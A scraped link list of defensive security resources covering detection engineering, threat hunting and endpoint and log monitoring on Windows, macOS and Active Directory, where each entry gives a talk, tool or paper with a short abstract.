- Learn How to Build Your Own Utility to Monitor Malicious Behaviors of Malware on macOS - Kai Lu(BH USA 2018)
-
Crescendo
-
File System/Files/Folders
- Articles/Blogposts/Writeups
-
Tooling
- filemon - An FSEvents clienthttp://newosxbook.com/tools/filemon.html
-
filewatcher(2018)
- Filewatcher is an auditing and monitoring utility for macOS. It can audit all events from the system auditpipe of macOS and filter them by process or by file
-
FileMonitor
- A macOS File Monitor (based on Apple's new Endpoint Security Framework)
-
Processes
- Articles/Blogposts/Writeups
-
Tooling
-
Process Monitor
- Process Monitor Library (based on Apple's new Endpoint Security Framework)
-
ProcInfo
- Proc Info is a open-source, user-mode, library for macOS. It provides simple interface to retrieve detailed information about running processes, plus allows one to asynchronously monitor process creation & exit events.
-
Process Monitor
-
Windows
- Articles/Writeups
- Talks/Presentations/Videos
- Understanding
- Tools
-
Audit Policy
-
101
-
Advanced security audit policy settings - docs.ms
- This reference for IT professionals provides information about the advanced audit policy settings that are available in Windows and the audit events that they generate. The security audit policy settings under Security Settings\Advanced Audit Policy Configuration can help your organization audit compliance with important business-related and security-related rules by tracking precisely defined activities
-
Advanced security audit policy settings - docs.ms
-
101
-
Files/Folders
-
Real-time file monitoring on Windows with osquery - trailofbits
- Trail of Bits has developed ntfs_journal_events, a new event-based osquery table for Windows that enables real-time file change monitoring.
-
Real-time file monitoring on Windows with osquery - trailofbits
- Processes
- Sysmon
Detection Engineering
-
101
-
Articles/Writeups
- Methods of Detection - Jack Crook
- What’s in a name? TTPs in Info Sec - Robby Winchester(2017)
-
Capability Abstraction - Jared Atkinson
- This is the first of a multipart blog series by the SpecterOps detection team. The goal of this series is to introduce and discuss foundational detection engineering concepts. To make these concepts as consumable as possible, we are focusing the entire series around Kerberoasting. Focusing on this technique allows readers to focus on the strategies presented in each article instead of worrying about the details of the technique itself. The focus of this post is a concept we call “capability abstraction.” The idea is that an attacker’s tools are merely an abstraction of their attack capabilities, and detection engineers must understand how to evaluate abstraction while building detection logic.
-
Uncovering The Unknowns - Jonathan Johnson(2019)
- Mapping Windows API’s to Sysmon Events
- Getting Started with ATT&CK: Detection and Analytics - John Wunder(2019)
- The Detection Maturity Level Model - Ryan Stillion(2014)
-
Talks & Presentations
-
$SignaturesAreDead = “Long Live RESILIENT Signatures” wide ascii nocase - Matthew Dunwoody, Daniel Bohannon(BruCON 0x0A)
- Signatures are dead, or so we're told. It's true that many items that are shared as Indicators of Compromise (file names/paths/sizes/hashes and network IPs/domains) are no longer effective. These rigid indicators break at the first attempt at evasion. Creating resilient detections that stand up to evasion attempts by dedicated attackers and researchers is challenging, but is possible with the right tools, visibility and methodical (read iterative) approach. As part of FireEye's Advanced Practices Team, we are tasked with creating resilient, high-fidelity detections that run across hundreds of environments and millions of endpoints. In this talk we will share insights on our processes and approaches to detection development, including practical examples derived from real-world attacks.
-
$SignaturesAreDead = “Long Live RESILIENT Signatures” wide ascii nocase - Matthew Dunwoody, Daniel Bohannon(BruCON 0x0A)
-
Articles/Writeups
- Linux
- macOS
-
Windows
-
Articles/Writeups
- Engineering Process Injection Detections - Part 1: Research - Jonathan Johnson(2020)
- [Execution - Powershell (T1086) - Rafael Bono, José Miguel Colmena]](https://ackcent.com/blog/execution-powershell-t1086/)
- Detection Engineering with Kerberoasting Series
- Host-based Threat Modeling & Indicator Design - Jared Atkinson(2017)
- Thoughts on Host-based Detection Techniques - Jared Atkinson(2017)
-
Black Hat: Detecting the unknown and disclosing a new attack technique at Black Hat 2019 - Brian Donohue
- Researchers Casey Smith and Ross Wolf demonstrated how to threat hunt for the unknown—and disclosed a new attack technique in the process—at the Black Hat security conference in Las Vegas, Nevada Thursday afternoon.
-
Talks & Presentations
-
How do I detect technique X in Windows?? Applied Methodology to Definitively Answer this Question - Matt Graeber(Derbycon 2019)
- Traditionally, the answer to this question has been to execute an attack technique in a controlled environment and to observe relevant events that surface. While this approach may suffice in some cases, ask yourself the following questions: ?Will this scale? Will this detect current/future variants of the technique? Is this resilient to bypass?? If your confidence level in answering these questions is not high, it?s time to consider a more mature methodology for identifying detection data sources. With a little bit of reverse engineering, a defender can unlock a multitude of otherwise unknown telemetry. This talk will establish a methodology for identifying detection data sources and will cover concepts including Event Tracing for Windows, WPP, TraceLogging, and security product analysis.
-
How do I detect technique X in Windows?? Applied Methodology to Definitively Answer this Question - Matt Graeber(Derbycon 2019)
-
Tools/Tooling
- API-To-Event](https://github.com/hunters-forge/API-To-Event)
- A repo focused primarily on documenting the relationships between API functions and security events that get generated when using such functions.
- API-To-Event](https://github.com/hunters-forge/API-To-Event)
-
Articles/Writeups
Threat Hunting
-
-
Articles/Writeups
- The Origin of Threat Hunting - TaoSecurity
- The Cyber Hunting Maturity Model - Sqrrl(2015)
- The ThreatHunting Project Annotated Reading List
- Incident Response is Dead… Long Live Incident Response - Scott J Roberts(2015)
-
Demystifying Threat Hunting Concepts - Josh Liburdi(2017)
- This post is about demystifying threat hunting concepts that seem to trip up practitioners and outsiders.
- A Simple Hunting Maturity Model - detect-respond.blogspot (2015)
- The Threat Hunting Reference Model Part 2: The Hunting Loop - Sqrrl
- The Who, What, Where, When, Why and How of Effective Threat Hunting - Robert Lee, Rob Lee(2016)
- Building Threat Hunting Strategies with the Diamond Model - Sergio Caltagirone(2016)
- Cyber Threat Hunting (1): Intro - Samuel Alonso(2016)
- Cyber Hunting: 5 Tips To Bag Your Prey - David J. Bianco
- Data Science Hunting Funnel - Austin Taylor(2017)
- DeTT&CT: Mapping your Blue Team to MITRE ATT&CK™ - Marcus Bakker
- The Role of Evidence Intention - Chris Sanders
- Threat Hunting - Getting Closer to Anomalous Behavior - findingbad.blogspot
-
On TTPs - Ryan Stillions
- [...]I set off a few months ago on a personal quest. I wanted to see if I could locate any official citations that attempted to clearly define, compare or contrast "TTPs" in a cyber context, and show how they could be used both individually and jointly with other models to further advance our work in the context of things above and beyond atomic Indicators of Compromise (IOCs). In this blog post I'll share with you what I found regarding the definitions of "TTPs", and then transition into how I believe they apply to incident detection and response.
- The PARIS Model
- Resources
-
Talks & Presentations
- Threat Hunting Workshop - Methodologies for Threat Analysis - RiskIQ
-
Find_Evil - Threat Hunting Anurag Khanna(SANS2020)
- Today, organizations are constantly under attack. While security teams are getting good at monitoring and incident response, the frontier to conquer is proactively looking for evil in the environment. Threat hunting is one of the ways in which organizations can proactively look for threats. This talk would discuss the fundamentals of threat hunting, what the hunting teams should look for and how to collect and analyze relevant data. We will discuss some of the recipes to perform threat hunting.
-
Papers
-
Generating Hypotheses for Successful Threat Hunting - Robert M. Lee, David Bianco
- Threat hunting is a proactive and iterative approach to detecting threats. Although threat hunters should rely heavily on automation and machine assistance, the process itself cannot be fully automated. One of the human’s key contributions to a hunt is the formulation of a hypotheses to guide the hunt. This paper explores three types of hypotheses and outlines how and when to formulate each of them.
- Hunt Evil: Your Practical Guide to Threat Hunting - threathunting.net
- Huntpedia - Sqrrl
- Threat Hunting: Open Season on the Adversary - Eric Cole(2016)
- Mental Models for Effective Searching - Chris Sanders
-
Generating Hypotheses for Successful Threat Hunting - Robert M. Lee, David Bianco
-
Articles/Writeups
-
-
Articles/Blogposts/Writeups
-
An In-Depth Look Into Data Stacking - M-Labs
- Data stacking is the application of frequency analysis to large volumes of similar data in an effort to isolate and identify anomalies. In short, data stacking is an investigative technique that can be used to find a needle in a digital haystack. It involves an iterative process of reducing large amounts of data into manageable chunks that can be consumed and investigated.
-
An In-Depth Look Into Data Stacking - M-Labs
-
Labs
- HELK
-
HELK - The Hunting ELK
- A Hunting ELK (Elasticsearch, Logstash, Kibana) with advanced analytic capabilities.
-
The Quieter You Become, the More You’re Able to (H)ELK - Nate Guagenti, Roberto Rodriquez - BSides Colombus Ohio 2018
- Enabling the correct endpoint logging and centralizing the collection of different data sources has finally become a basic security standard. This allows organizations to not just increase the level of visibility, but to enhance their threat detection. Solutions such as an (Elastic) ELK stack have largely been adopted by small and large organizations for data ingestion, storage and visualization. Although, it might seem that collecting a massive amount of data is all analysts need to do their jobs, there are several challenges for them when faced with large, unstructured and often incomplete/disparate data sets. In addition to the sisyphean task of detecting and responding to adversaries there may be pitfalls with organizational funding, support, and or approval (Government). Although “everyone” is collecting logs and despite the many challenges, we will show you how to make sense of these logs in an efficient and consistent way. Specifically when it comes to Windows Event logs (ie: Sysmon, PowerShell, etc) and the ability to map fields to other logs such as Bro NSM or some other network monitoring/prevention device. This will include different Windows Event log data normalization techniques across the 1,000+ unique Event IDs and its 3,000+ unique fields. Also, proven data normalization techniques such as hashing fields/values for logs such as PowerShell, Scheduled Tasks, Command Line, and more. These implementations will show how it allows an analyst to efficiently “pivot” from an endpoint log to a NSM log or a device configuration change log. However, we will also show how an analyst can make an informed decision without degrading/hindering their investigation as well as to enhance their decision. Whether this is preventing an analyst from excluding keywords that a malicious actor may include as an “evasion” technique or adding additional analysis techniques (ie: graphing).
-
HELK - The Hunting ELK
- HELK
-
EQL
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
-
Tooling
-
EQL Analytics Library
- The Event Query Language Analytics Library (eqllib) is a library of event based analytics, written in EQL to detect adversary behaviors identified in MITRE ATT&CK™.
-
Varna
- Varna is an AWS serverless cloud security tool that parses and alerts on CloudTrail logs using Event Query Language (EQL). Varna is deployed as a lambda function, for scanning and serving web requests, and a dynamodb table, for keeping track of seen alerts. Varna is cheap & efficient to run, costing less than 15 dollars a month with proper configuration and ingesting alerts as soon as CloudTrail stores them in S3.
-
EQL Analytics Library
-
Articles/Blogposts/Writeups
-
Hunt Experiences/Demonstrations of
- Articles/Blogposts/Writeups
-
Talks/Presentations/Papers
- License to Kill: Malware Hunting with the Sysinternals Tools
-
Advanced Attack Detection - William Burgess, Matt Watkins(Securi-Tay2017)
- In this talk, we’ll explain some of the technical concepts of threat hunting. We will be looking at what is beyond traditional signature detection – the likes of AV, IPS/IDS and SIEMs, which in our experience are ineffective – and detailing some of the ways you can catch real attackers in the act. As a case study, we’ll look at some of the specifics of common attack frameworks - the likes of Metasploit and Powershell Empire - walking through an example attack, and showing how they can be detected. From large-scale process monitoring to live memory analysis and anomaly detection techniques, we will cover some of the technical quirks when it comes to effective attack detection.
-
- 101
- Articles/Blogposts/Writeups
-
Tooling
-
memhunter
- Memhunter is an endpoint sensor tool that is specialized in detecing resident malware, improving the threat hunter analysis process and remediation times. The tool detects and reports memory-resident malware living on endpoint processes. Memhunter detects known malicious memory injection techniques. The detection process is performed through live analysis and without needing memory dumps. The tool was designed as a replacement of memory forensic volatility plugins such as malfind and hollowfind. The idea of not requiring memory dumps helps on performing the memory resident malware threat hunting at scale, without manual analysis, and without the complex infrastructure needed to move dumps to forensic environments. Besides the data collection and hunting heuristics, the project has also led to the creation of a companion tool called "minjector" that contains +15 code injection techniques. The minjector tool cannot onlybe used to exercise memhunter detections, but also as a one-stop location to learn on well-known code injection techniques out there.
-
memhunter
-
- 101
-
Articles/Writeups
-
The ThreatHunting Project
- An informational repo about hunting for adversaries in your IT environment.
-
Outbound RDP Surprises - Justin Vaicaro()
- The goal of this blog post is not to dissect the threat hunting process or dive into the various hunting strategies and tactics. Rather, the intent is to show the importance of focusing on a legitimate protocol within a threat hunt engagement that can be easily used for potential data exfiltration, hide in plain sight with other normal traffic, and go unnoticed by a security operations center (SOC) that is untrained to identify potentially suspicious network behavior.
-
The ThreatHunting Project
- Talks & Presentations
-
Tools
-
grapl
- Grapl is a Graph Platform for Detection and Response with a focus on helping Detection Engineers and Incident Responders stop fighting their data and start connecting it. Grapl leverages graph data structures at its core to ensure that you can query and connect your data efficiently, model complex attacker behaviors for detection, and easily expand suspicious behaviors to encompass the full scope of an ongoing intrusion.
-
grapl
-
- 101
- Articles/Writeups
-
Talks & Presentations
-
Tales from the Network Threat Hunting Trenches - BHIS
- In this webcast John walks through a couple of cool things we’ve found useful in some recent network hunt teams. He also shares some of our techniques and tools (like RITA) that we use all the time to work through massive amounts of data. There are lots of awesome websites that can greatly increase the effectiveness of your in network threat hunting.
-
Network gravity: Exploiring a enterprise network - Casey Martin(BSides Tampa2020)
- Enterprise networks are often complex, hard to understand, and worst of all - undocumented. Few organizations have network diagrams and asset management systems and even fewer organizations have those that are effective and up to date. Leveraging an organization's SIEM or logging solution, network diagrams and asset inventories can be extrapolated from this data through the 'gravity' of the network. Similar to our solar system and galaxy, even if you cannot confirm or physically see an object, you can measure the forces of gravity it exerts on the observable objects around it that we do know about. For example, unconfirmed endpoints can be enumerated by the authentication activity they register on known domain controllers. The inferred list of endpoints and their network addresses can begin to map out logical networks. The unpolished list of logical networks can be mapped against known egress points to identify physical networks and potentially identify undiscovered egress points and the technologies that exist at the egress points. As more objects are extrapolated and inferred, the more accurate the model of your enterprise network will become. Through this iterative and repeatable process, network diagrams and asset inventories can be drafted, further explored, refined, and ultimately managed. Even the weakest of observable forces can create fingerprints that security professionals can leverage to more effectively become guardians of the galaxy.
-
Tales from the Network Threat Hunting Trenches - BHIS
-
Papers
-
Under the Shadow of Sunshine: Understanding and Detecting Bulletproof Hosting on Legitimate Service Provider Networks - Sumayah Alrwais, Xiaojing Liao, Xianghang Mi, Peng Wang, XiaoFeng Wang, Feng Qian, Raheem Beyah, Damon McCoy
- In this paper, we present the first systematic study on thisnew trend of BPH services. By collecting and analyzing a large amount of data (25 Whois snapshots of the entire IPv4 addressspace, 1.5 TB of passive DNS data, and longitudinal data fromseveral blacklist feeds), we are able to identify a set of newfeatures that uniquely characterizes BPH on sub-allocations and are costly to evade. Based upon these features, we train a classifierfor detecting malicious sub-allocated network blocks, achieving a 98% recall and 1.5% false discovery rates according to our evaluation. Using a conservatively trained version of our classifier,we scan the whole IPv4 address space and detect 39K malicious network blocks. This allows us to perform a large-scale study ofthe BPH service ecosystem, which sheds light on this underground business strategy, including patterns of network blocks being recycled and malicious clients migrating to different network blocks, in an effort to evade IP address based blacklisting. Our study highlights the trend of agile BPH services and points to potential methods of detecting and mitigating this emerging threat.
-
Under the Shadow of Sunshine: Understanding and Detecting Bulletproof Hosting on Legitimate Service Provider Networks - Sumayah Alrwais, Xiaojing Liao, Xianghang Mi, Peng Wang, XiaoFeng Wang, Feng Qian, Raheem Beyah, Damon McCoy
-
Tools
-
Imaginary C2
- A python tool which aims to help in the behavioral (network) analysis of malware. Imaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads.
-
Imaginary C2
- DNS
-
-
Behavioral Analysis using DNS, Network Traffic and Logs, Josh Pyorre (@joshpyorre)
- Multiple methods exist for detecting malicious activity in a network, including intrusion detection, anti-virus, and log analysis. However, the majority of these use signatures, looking for already known events and they typically require some level of human intervention and maintenance. Using behavioral analysis methods, it may be possible to observe and create a baseline of average behavior on a network, enabling intelligent notification of anomalous activity. This talk will demonstrate methods of performing this activity in different environments. Attendees will learn new methods which they can apply to further monitor and secure their networks
- DNS
- SMB
-
TLS
- TLS client fingerprinting with Bro
-
JA3 - A method for profiling SSL/TLS Clients
- JA3 is a method for creating SSL/TLS client fingerprints that are easy to produce and can be easily shared for threat intelligence.
-
Talk/Presentation
- In this talk we will show the benefits of SSL fingerprinting, JA3’s capabilities, and how best to utilize it in your detection and response operations. We will show how to utilize JA3 to find and detect SSL malware on your network. Imagine detecting every Meterpreter shell, regardless of C2 and without the need for SSL interception. We will also announce JA3S, JA3 for SSL server fingerprinting. Imagine detecting every Metasploit Multi Handler or [REDACTED] C2s on AWS. Then we’ll tie it all together, making you armed to the teeth for detecting all things SSL.
-
Tools
-
RITA - Real Intelligence Threat Analytics
- RITA is an open source network traffic analysis framework.
- RITA - Finding Bad Things on Your Network Using Free and Open Source Tools
-
General
-
DNSpop
- Tools to find popular trends by analysis of DNS data. For more information, see my blog post on the most popular subdomains on the internet. Hit the results directory to get straight to the data.
-
Yeti
- Yeti is a platform meant to organize observables, indicators of compromise, TTPs, and knowledge on threats in a single, unified repository. Yeti will also automatically enrich observables (e.g. resolve domains, geolocate IPs) so that you don't have to. Yeti provides an interface for humans (shiny Bootstrap-based UI) and one for machines (web API) so that your other tools can talk nicely to it.
-
Malcom - Malware Communication Analyzer
- Malcom is a tool designed to analyze a system's network communication using graphical representations of network traffic, and cross-reference them with known malware sources. This comes handy when analyzing how certain malware species try to communicate with the outside world.
-
BeaconBits
- Beacon Bits is comprised of analytical scripts combined with a custom database that evaluate flow traffic for statistical uniformity over a given period of time. The tool relies on some of the most common characteristics of infected host persisting in connection attempts to establish a connection, either to a remote host or set of host over a TCP network connection. Useful to also identify automation, host behavior that is not driven by humans.
-
DNSpop
-
RITA - Real Intelligence Threat Analytics
-
Behavioral Analysis using DNS, Network Traffic and Logs, Josh Pyorre (@joshpyorre)
-
- 101
-
Articles/Writeups
-
Mac system extensions for threat detection: Part 1 - Will Yu
- Part 2
- Part 3
- In part 1 of this series, we’ll go over some of the frameworks accessible by kernel extensions that provide information about file system, process, and network events. These frameworks include the Mandatory Access Control Framework, the KAuth framework, and the IP/socket filter frameworks. We won't do a deep dive into each one of these frameworks specifically, as there have been many other posts and guides 0 1 2 3 4 regarding how to use these frameworks. Instead, we’ll recap and review each of these frameworks, then in part 2 we’ll cover some valuable tips and tricks we can use inside the kernel extensions framework that will no longer be available in the new SystemExtensions framework starting in macOS 10.15. And finally, in part 3 of the series, we’ll cover the new SystemExtensions framework and the features it provides to third-party developers.
- Hunting for Bad Apples – Part 1 - Richie Cyrus
- Logs Unite! Forensic Analysis Of Apple Unified Logs - Sarah Edwards(2017)
-
Mac system extensions for threat detection: Part 1 - Will Yu
-
Talks & Presentations
-
When Macs Come Under ATT&CK - Richie Cyrus(OBTSv1.0)
- This talk will discuss common tactics, techniques and procedures used by attackers on MacOS systems, as well as methods to detect adversary activity. We will take a look at known malware, mapping the techniques utilized to the MITRE ATT&CK framework. Attendees will leave equipped to begin hunting for evil lurking within their MacOS fleet.
- When Macs Come Under ATT&CK - Richie Cyrus(Derbycon2018)
-
When Macs Come Under ATT&CK - Richie Cyrus(OBTSv1.0)
-
Tools
-
Venator
- Venator is a python tool used to gather data for proactive detection of malicious activity on macOS devices.
- Blogpost - Richie Cyrus(2019)
- [Cleaning the Apple Orchard Using Venator to Detect macOS Compromise - Richie Cyrus(BSides Charm 2019)]
- Various solutions exist to detect malicious activity on macOS. However, they are not intended for enterprise use or involve installation of an agent. This session will introduce and demonstrate how to detect malicious macOS activity using the tool Venator. Venator is a python based macOS tool designed to provide defenders with the data to proactively identify malicious macOS activity at scale.
-
TrueTree
- TrueTree is more than just a pstree command for macOS. It is used to display a process tree for current running processes while using a hierarchy built on additoinal pids that can be collected from the operating system. The standard process tree on macOS that can be built with traditional pids and ppids is less than helpful on macOS due to all the XPC communication at play. The vast majority of processes end up having a parent process of launchd. TrueTree however displays a process tree that is meant to be useful to incident responders, threat hunters, researchers, and everything in between!
- Blogpost
-
Venator
-
-
General
-
Articles/Writeups
- Part 1: Intro to Threat Hunting with Powershell Empire, Windows event logs, and Graylog - Spartan2194(2017)
- Spotting the Adversary with Windows Event Log Monitoring - NSA
- Windows Event ID 4649 “A replay attack was detected “ — Oh really? Are we under ATTACK? Should we do Incident Response? - Iveco Aliza(2020)
- Sysmon Threat Analysis Guide - Andy Green(2020)
-
Blue Team Hacks - Binary Rename
- "In this post I thought I would share an interesting proof of concept I developed to detect Binary Rename of commonly abused binaries. Im going to describe the detection, its limitations and share the code."
-
Binary Rename 2
- In this post I am focusing on static detection, that is assessing files on disk. I am going to describe differences between both Yara and Powershell based detections, then share the code.
-
Papers
-
Detecting Security Incidents Using Windows WorkstationEvent Logs - Russ Anthony(2013)
- Windows event logs can be an extremely valuable resource todetect securityincidents. While many companies collect logs from security devices and critical serversto comply with regulatory requirements, few collect them from their windows workstations;even fewer proactively analyze theselogs. Collecting and analyzingworkstation logs is critical because it is increasinglyatthe workstation levelwherethe initial compromiseishappening.If we areto get better at detecting theseinitial compromisesthen it is imperative that we develop an efficient,common sense approach to collectingand analyzingthese events.
-
Windows Logon Forensics - Sunil Gupta(2013)
- A compromised Windows® system's forensic analysis may not yield much relevant information about the actual target. Microsoft® Windows Operating System uses a variety of logon and authentication mechanisms to connect to remote systems over the network. Incident Response and Forensic Analysis outcomes are prone to errors without proper understanding of different account types, Windows logons and authentication methods available on a Windows platform. This paper walks thru the logon and authentication and how they are audited for various Windows account types’ logons for a successful investigation. In the process it describes common authentication protocols such as Kerberos, NTLM to better understanding of the logon process communications in the Windows environment.
- Detecting Advanced Threats With Sysmon, WEF, and ElasticSearch - Josh Lewis(2015)
-
Detecting Security Incidents Using Windows WorkstationEvent Logs - Russ Anthony(2013)
- Talks & Presentations *
-
Articles/Writeups
-
Active Directory
-
101
-
Monitoring Active Directory for Signs of Compromise - docs.ms
- Applies To: Windows Server 2016, Windows Server 2012 R2, Windows Server 2012
-
Appendix L: Events to Monitor - docs.ms
- The following table lists events that you should monitor in your environment, according to the recommendations provided in Monitoring Active Directory for Signs of Compromise.
-
Monitoring Active Directory for Signs of Compromise - docs.ms
- Articles/Writeups
-
Talks/Presentations/Videos
-
Detecting the Elusive Active Directory Threat Hunting - Sean Metcalf(BSidesCharm2017)
- Attacks are rarely detected even after months of activity. What are defenders missing and how could an attack by detected? This talk covers effective methods to detect attacker activity using the features built into Windows and how to optimize a detection strategy. The primary focus is on what knobs can be turned and what buttons can be pushed to better detect attacks. One of the latest tools in the offensive toolkit is ""Kerberoast"" which involves cracking service account passwords offline without admin rights. This attack technique is covered at length including the latest methods to extract and crack the passwords. Furthermore, this talk describes a new detection method the presenter developed. The attacker's playbook evolves quickly, defenders need to stay up to speed on the latest attack methods and ways to detect them. This presentation will help you better understand what events really matter and how to better leverage Windows features to track, limit, and detect attacks.
- Slides
-
Detecting the Elusive Active Directory Threat Hunting - Sean Metcalf(BSidesCharm2017)
-
Tools
-
WatchAD
- After Collecting event logs and kerberos traffic on all domain controllers, WatchAD can detect a variety of known or unknown threats through features matching, Kerberos protocol analysis, historical behaviors, sensitive operations, honeypot accounts and so on. The WatchAD rules cover the many common AD attacks.
-
WatchAD
-
101
-
Azure
- Articles/Writeups
-
Browser Extensions
-
Articles/Writeups
-
Chrome Extensions: Bypassing your security - Pablo Delgado(2017)
- Hunting Chrome extensions in Win AD environment with Sysmon and ELK.
-
Chrome Extensions: Bypassing your security - Pablo Delgado(2017)
-
Articles/Writeups
-
Credential Access
- Articles/Writeups
-
Papers
-
A Process is No One: Hunting for Token Manipulation - Jared Atkinson, Robby Winchester(2017)
- In this paper, we will outline how we view hunting through our five step approach to perform hypothesis driven hunting. In addition, we will walk through a case study detecting Access Token Manipulation, highlighting the actions performed at each step of the process. At the conclusion of the paper, the reader should better understand hunting, our five-step hypothesis process, and how to apply it to real world scenarios.
-
A Process is No One: Hunting for Token Manipulation - Jared Atkinson, Robby Winchester(2017)
- COM
- CSharp
-
Event Logs
- Articles/Writeups
-
Talks/Presentations/Videos
-
What Event Logs? Part 1: Attacker Tricks to Remove Event Logs - Matt Bromiley(SANS DFIR 2018)
- In part 1 of this series, SANS instructor and incident responder Matt Bromiley focuses on techniques, old and new, that attackers are using to neutralize event logs as a recording mechanism. Ranging from clearing of logs to surgical, specific event removal, in this webcast we will discuss how the attackers are doing what they're doing, and the forensic techniques we can use to detect their methods. There has been a lot of discussions lately about attackers' ability to fool the system into not writing event logs - but are our attackers truly staying hidden when they do this? Let's find out!
-
What Event Logs Part 2 Lateral Movement without Event Logs - Matt Bromiley(SANS DFIR 2018)
- In part 2 of this series, SANS instructor and incident responder Matt Bromiley will discuss techniques to identify lateral movement when Windows Event Logs are not present. Sometimes logs roll without preservation, and sometimes attackers remove them from infected systems. Despite this, there are still multiple artifacts we can rely on to identify where our attackers came from, and where they went. In this webcast, we'll discuss the techniques and artifacts to identify this activity.
-
What Event Logs? Part 1: Attacker Tricks to Remove Event Logs - Matt Bromiley(SANS DFIR 2018)
-
Lateral Movement
- Articles/Writeups
-
Tools
-
kethash
- A little tool for detecting suspicious privileged NTLM connections, in particular Pass-The-Hash attack, based on event viewer logs.
-
kethash
-
LoLBins
- Articles/Writeups
-
.NET
-
Articles/Writeups
- Interesting DFIR traces of .NET CLR Usage Logs - menasec.net
- Detecting attacks leveraging the .NET Framework - Zac Brown, Shane Welcher(2020)
- Hunting For In-Memory .NET Attacks - Joe Desimone(2017)
-
Hunting for SILENTTRINITY - Wee-Jing Chung(2019)
- SILENTTRINITY (byt3bl33d3r, 2018) is a recently released post-exploitation agent powered by IronPython and C#. This blog post will delve into how it works and techniques for detection.
-
Tools
-
ClrGuard
- ClrGuard is a proof of concept project to explore instrumenting the Common Language Runtime (CLR) for security purposes. ClrGuard leverages a simple appInit DLL (ClrHook32/64.dll) in order to load into all CLR/.NET processes. From there, it performs an in-line hook of security critical functions. Currently, the only implemented hook is on the native LoadImage() function. When events are observed, they are sent over a named pipe to a monitoring process for further introspection and mitigation decision.
-
ClrGuard
-
Articles/Writeups
-
Network-Facing Services
-
Articles/Writeups
- [WebDAV Traffic To Malicious Sites - Didier Stevens]( https://blog.didierstevens.com/2017/11/13/webdav-traffic-to-malicious-sites/)
- TL;DR: when files are retrieved remotely with the file:// URI scheme on Windows, Windows will fallback to WebDAV when SMB connections can not be established.
- [WebDAV Traffic To Malicious Sites - Didier Stevens]( https://blog.didierstevens.com/2017/11/13/webdav-traffic-to-malicious-sites/)
-
Articles/Writeups
-
Persistence
- Articles/Writeups
-
Talks/Presentations/Videos
-
Obtaining and Detecting Domain Persistence - Grant Bugher(DEF CON 23)
- When a Windows domain is compromised, an attacker has several options to create backdoors, obscure his tracks, and make his access difficult to detect and remove. In this talk, I discuss ways that an attacker who has obtained domain administrator privileges can extend, persist, and maintain control, as well as how a forensic examiner or incident responder could detect these activities and root out an attacker.
-
Obtaining and Detecting Domain Persistence - Grant Bugher(DEF CON 23)
-
Tools
-
Windows-Hunting
- (Has info on Persistence) The Purpose of this repository is to aid windows threat hunters to look for some common artifacts during their day to day operations.
-
Windows-Hunting
- Privilege Escalation
-
Processes
- Articles/Writeups
-
Talks/Presentations/Videos
-
Tricking modern endpoint security products - Michel Coene(SANS2020)
- The current endpoint monitoring capabilities we have available to us are unprecedented. Many tools and our self/community-built detection rules rely on parent-child relationships and command-line arguments to detect malicious activity taking place on a system. There are, however, ways the adversaries can get around these detections. During this presentation, we'll talk about the following techniques and how we can detect them: Parent-child relationships spoofing; Command-line arguments spoofing; Process injection; Process hollowing
-
Tricking modern endpoint security products - Michel Coene(SANS2020)
-
Tools
-
PE-Sieve
- [..]tool that helps to detect malware running on the system, as well as to collect the potentially malicious material for further analysis. Recognizes and dumps variety of implants within the scanned process: replaced/injected PEs, shellcodes, hooks, and other in-memory patches. Detects inline hooks, Process Hollowing, Process Doppelgänging, Reflective DLL Injection, etc.
-
hollows_hunter
- Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).
-
Get-InjectedThread.ps1
- Looks for threads that were created as a result of code injection.
-
PE-Sieve
-
PowerShell
-
Articles/Writeups
- Revoke -‐ Obfuscation: PowerShell Obfuscation Detection Using Science
-
Attack and Defense Around PowerShell Event Logging - Mina Hao(2019)
- Blogpost discussing logging mechanisms in PowerShell up to v6.
- Greater Visibility Through PowerShell Logging - Matthew Dunwoody(2016)
-
DeepBlueCLI
- a PowerShell Module for Threat Hunting via Windows Event Logs
-
Securing PowerShell in the Enterprise - Australian Cyber Security Center(2020)
- This document describes a maturity framework for PowerShell in a way that balances the security and business requirements of organisations. This maturity framework will enable organisations to take incremental steps towards securing PowerShell across their environment; Appendix E - Strings for log analysis
- From PowerShell to P0W3rH3LL – Auditing PowerShell - ingmar.koecher(2018)
- Windows Log Hunting with PowerShell
- Uncovering Indicators of Compromise (IoC) Using PowerShell, Event Logs, and a Traditional Monitoring Tool
- Detecting Offensive PowerShell Attack Tools - adsecurity.org
-
Attack and Defense Around PowerShell Event Logging - Mina Hao(2019)
- This document dwells upon security features of the logging function of major versions of PowerShell, as well as attack means, ideas, and techniques against each version of the event viewer.
- Detecting Modern PowerShell Attacks with SIEM - Justin Henderson
-
PowerShell Security: Is itEnough? - Timothy Hoffman
- "This paper aims to analyze a PowerShell-based attack campaign and evaluate each security feature in its ability to effectively prevent or detect the attacksindividually and collectively. These results will in no way be all inclusive, as technology is ever-changing, andnewmethods are emergingto counteract current security measures"
-
Talks/Presentations/Videos
-
Hunting for PowerShell Abuse - Teymur Kheirkhabarov(Offzone2019)
- Slides
- In the presentation author is going to demostrate an approaches for detection of PowerShell abuses based on different event sources like native Windows logging capabilities as well as usage of additional tools, like Sysmon or EDR solutions. How to collect traces of using PowerShell, how to filter out false positives, and how to find evidence of malicious uses among the remaining after filtering volume of events — all these questions will be answered in the talk for present and future threat hunters.
- Tracking Activity and Abuse of PowerShell - Carlos Perez(PSConEU 2019)
-
Investigating PowerShell Attacks - Ryan Kazanciyan, Matt Hastings(BHUSA2014)
- Paper
- This presentation will focus on common attack patterns performed through PowerShell - such as lateral movement, remote command execution, reconnaissance, file transfer, and establishing persistence - and the sources of evidence they leave behind. We'll demonstrate how to collect and interpret these forensic artifacts, both on individual hosts and at scale across the enterprise. Throughout the presentation, we'll include examples from real-world incidents and recommendations on how to limit exposure to these attacks."
-
Hunting for PowerShell Abuse - Teymur Kheirkhabarov(Offzone2019)
-
Tooling
-
Kansa
- A modular incident response framework in Powershell. It's been tested in PSv2 / .NET 2 and later and works mostly without issue. It uses Powershell Remoting to run user contributed, ahem, user contri- buted modules across hosts in an enterprise to collect data for use during incident response, breach hunts, or for building an environmental baseline.
-
Kansa
-
Articles/Writeups
-
ShimCache
- Articles/Writeups
-
Services
-
Services: Windows 10 Services(ss64)
- A list of the default services in Windows 10 (build 1903).
-
